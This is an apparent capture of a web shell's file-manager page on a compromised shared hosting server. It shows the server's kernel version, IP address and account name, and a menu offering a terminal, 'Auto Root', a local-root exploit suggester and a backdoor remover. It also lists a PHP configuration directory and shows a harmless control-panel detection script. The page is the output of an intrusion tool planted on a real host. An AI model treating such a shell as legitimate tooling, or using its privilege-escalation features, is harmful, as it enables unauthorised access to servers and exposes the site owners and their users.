Linux server.edchosting.com 4.18.0-553.79.1.lve.el7h.x86_64 #1 SMP Wed Oct 15 16:34:46 UTC 2025 x86_64
LiteSpeed
Server IP : 75.98.162.185 & Your IP : 216.73.216.163
Domains :
Cant Read [ /etc/named.conf ]
User : goons4good
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
alt-php-config /
Delete
Unzip
Name
Size
Permission
Date
Action
__pycache__
[ DIR ]
drwxr-xr-x
2023-05-05 04:47
alt-php-panel-configuration.py
8.54
KB
-rwxr-xr-x
2026-01-12 17:12
alt-php-panel-configuration.pyc
8.47
KB
-rw-r--r--
2026-01-12 17:19
alt-php-panel-configuration.pyo
8.47
KB
-rw-r--r--
2026-01-12 17:19
alt-php.cfg
276
B
-rwxr-xr-x
2024-04-24 12:19
alt-php.cfg.rpmnew
259
B
-rwxr-xr-x
2023-01-19 09:50
detectcp.py
690
B
-rwxr-xr-x
2026-01-12 17:12
detectcp.pyc
740
B
-rw-r--r--
2026-01-12 17:19
detectcp.pyo
740
B
-rw-r--r--
2026-01-12 17:19
install_odbc
526
B
-rwxr-xr-x
2026-01-12 17:12
multiphp_reconfigure.py
7.7
KB
-rwxr-xr-x
2026-01-12 17:12
multiphp_reconfigure.pyc
7.94
KB
-rw-r--r--
2026-01-12 17:19
multiphp_reconfigure.pyo
7.94
KB
-rw-r--r--
2026-01-12 17:19
Save
Rename
#!/usr/bin/env python # -*- mode:python; coding:utf-8; -*- import os def getCPName(): # cPanel if os.path.isfile('/usr/local/cpanel/cpanel'): return "cPanel" # DirectAdmin if os.path.isfile('/usr/local/directadmin/directadmin') or \ os.path.isfile('/usr/local/directadmin/custombuild/build'): return "DirectAdmin" # InterWorx if os.path.isfile('/usr/local/interworx/iworx.ini'): return "InterWorx" # ISPManager if os.path.isfile('/usr/local/ispmgr/bin/ispmgr'): return "ISPManager" # Plesk if os.path.isfile('/usr/local/psa/version'): return "Plesk" # Unknown panel / No panel return "Unknown"